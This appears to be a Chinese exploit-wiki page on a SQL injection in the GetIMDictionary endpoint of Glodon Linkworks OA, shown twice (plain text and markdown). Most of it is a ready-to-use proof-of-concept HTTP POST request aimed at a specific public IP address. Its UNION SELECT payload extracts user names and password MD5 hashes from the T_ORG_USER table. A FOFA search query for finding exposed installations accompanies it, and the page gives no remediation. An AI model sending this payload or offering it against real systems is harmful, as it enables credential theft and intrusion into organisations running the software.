fofamini-wiki

登录白背景

源码

广联达OA GetIMDictionarySQL注入漏洞

一、漏洞简介

广联达办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。

二、影响版本

广联达办公OA

三、资产测绘

app.name="广联达 OA"
登录页面

四、漏洞复现

可通过POC获取存在账号密码的MD5值

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: 27.147.184.214:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=iq02bz1sdodmt2z0ox1rjnqy; GTP_IdServer_LangID=2052
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

原文: https://www.yuque.com/xiaokp7/ocvun2/id8z4oom7dz9k3eh

# 广联达OA GetIMDictionarySQL注入漏洞

# 一、漏洞简介
广联达办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。

# 二、影响版本

- 广联达办公OA

# 三、资产测绘

- app.name="广联达 OA"
- 登录页面

![image.png](./img/TIs-PhFmcAb-XhzJ/1693579287118-af540618-cbfd-44d4-82b6-cf9792772477-707696.png)

# 四、漏洞复现
可通过POC获取存在账号密码的MD5值
```java
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: 27.147.184.214:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=iq02bz1sdodmt2z0ox1rjnqy; GTP_IdServer_LangID=2052
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
```
![image.png](./img/TIs-PhFmcAb-XhzJ/1693579359017-483111b6-c8e3-4201-a8c5-d21a3857abf4-456786.png)
![image.png](./img/TIs-PhFmcAb-XhzJ/1693579404764-6292c681-8d85-4adc-92a4-7793bf29ace2-470417.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/id8z4oom7dz9k3eh>